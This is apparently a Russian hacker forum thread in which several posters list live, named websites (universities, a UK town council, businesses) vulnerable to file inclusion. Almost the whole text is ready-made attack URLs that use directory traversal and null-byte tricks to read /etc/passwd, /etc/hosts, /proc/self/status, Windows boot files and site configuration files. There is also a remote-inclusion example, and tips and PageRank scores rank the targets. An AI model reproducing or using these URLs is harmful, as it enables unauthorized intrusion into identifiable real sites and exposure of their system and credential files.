http://www.claregolf.ca/page.php?page=../../../../etc/passwd
and
RFI
http://www.claregolf.ca/page.php?page=[URL]
пример:
http://www.claregolf.ca/page.php?page=http://forum.antichat.ru/index.php
http://www.stanthony-hawthorne.org/index.htm?page=../../../../../../../../../../etc/passwd
http://www.kanzleikormaier.de/vorschau.php?page=../../../../../../etc/passwd
http://www.edba.in.th/AboutUs/static01.php?FL=../../../../../../../../../../etc/passwd
http://selaus.com/?pg=../index
Заработай бабла...
http://www.afl.ru/index.php?c=germany&lang=ru&cont=../../../../../../../../../../../../etc/passwd
едушка
http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\boot.ini&linenums
http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\ntldr&linenums
http://content.hccfl.edu/pollock/PHP/lister.php?file=C:\ntdetect.com&linenums
allow_url_include=On Ho! php файлы не интерпретируются
PR-6
http://autobus.cyclingnews.com/road/2009/apr09/roubaix09/?id=../../../../../../../../etc/passwd%00
Университет штата Джорджия
http://www.rhetcomp.gsu.edu/~gpullman/3080/template.php?assignments&file=../../../../../../etc/passwd
PR-7
тИЦ-475
---------------------------------------------------
http://www.langarts-edu.com/showfile.php?FILE=../../../../../../../../etc/hosts
http://www.langarts-edu.com/showfile.php?FILE=../../../../../../../../etc/passwd
http://noni-nsk.ru/new.php?n=../configuration.php
смотри в исходный код
Virologist
29.05.2010, 22:26
http://svaltera.zp.ua/index.php?inc=../../../../../../../../etc/passwd
http://www.humboldtschule-berlin.de/profil/profil.php?ID=../include/chinesisch
%00 не канает.
Virologist
30.05.2010, 11:19
http://rastaman.tales.ru/index.php?page=/etc/passwd%00
http://www.bluethner.ru/modelle/mcontent.php?page=/etc/passwd - Ctrl+A ;)
http://www.dekolink.ru/index.php?page=/etc/passwd
http://belfilarmony.ru/index.php?page=/etc/passwd&id_news=27&year=2010
Международная ассоциация специалистов по сельскому хозяйству
http://www.iaald.org/index.php?page=/httpd/html/iaaldorg/www/members.php
PR-6
-------------------------------------------------------------------------------------
Bishop's Stortford Town Council
http://www.bishopsstortfordtc.gov.uk/download.php?file=../../../../../../../etc/hosts
http://www.bishopsstortfordtc.gov.uk/download.php?file=../../../../../../../../../etc/passwd
PR-4
http://ballhockey.com/index.php?p=../../../../../../../etc/passwd
and
http://www.chateauderazay.com/index.php?goto=../../../../../etc/hosts
and
http://www.uni-selectcanada.com/eng/page.php?page_id=../../../../etc/hosts&execute=1&div_id=14
http://www.beauty.f-dom.com/?x=../../../../../../../../../../../etc/passwd%00
http://maclaycrew.org/index.php?page=../../../../../../../etc/passwd
and
http://www.chiangmaiadventure.co.th/?file=../../../home/donot6/public_html/index.php&lg=th&sd=&yyyymm=200908&title=
http://www.hayat.az/index.php?open=1&page=../../../../../../../home2/hayataz/public_html/index
http://www.nbas.ch/index.php?menu=../../../../../../../../../../../../etc/passwd%00
http://lymphaticdiseasessociety.org/main.php?menu=../../../../../../../../../../../../proc/self/status%00&content=donate-financial
http://allianceoflymphaticdiseases.org/main.php?menu=../../../../../../../../../../../../proc/self/status%00&txt=Fundraising%C2%A0/%C2%A0Events
wildshaman
08.06.2010, 19:47
PR 4
http://www.horselaw.com/index.php?b=../../../../../../../../etc/passwd%00
PR4
http://www.tzell.com/index.php?b=../../../../etc/passwd%00
wildshaman
11.06.2010, 14:22
http://www.philol.msu.ru/~umo/include.php?url=../functions.php
сайт филологического факультета МГУ имени М. В. Ломоносова
http://www.westernreservepsych.com/at.php?incfile=../../../../../etc/hosts
http://www.westernreservepsych.com/at.php?incfile=../../../../../etc/passwd
http://billyblock.com/home.php?pg=../../../../../etc/passwd%00
http://www.gloriousnoise.com/?pg=../etc/passwd
*uNkN0Wn*
16.06.2010, 00:05
http://www.sampleswap.org/filebrowser-new.php?d=../../../../../../../
PR-5
*uNkN0Wn*
16.06.2010, 11:37
http://www.vcdh.virginia.edu/index.php?page=../../../../../etc/passwd%00
тИЦ — 10
PR — 6
http://www.anandkrishna.org/english/index2.php?isi=../../../../../../../../etc/passwd
http://www.anandkrishna.org/english/index2.php?isi=../../../../../../../../etc/hosts
path
/home/sloki/user/t12983/sites/anandkrishna.org/www/
PR-4
----------------
http://www.ict4dasean.org/index2.php?main=../../../../../../../../../../etc/passwd
http://www.ict4dasean.org/index2.php?main=../../../../../../../../../../etc/hosts
PR-5
----------------
http://datasunda.org/php/dnl.php?type=ri&file=../../../../../../../../../../etc/passwd&titre=passwd
-----------
http://ansc.niu.edu.tw/download.php?filename=passwd&dir=../../../../../../../../../etc&title=passwd
PR-4
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot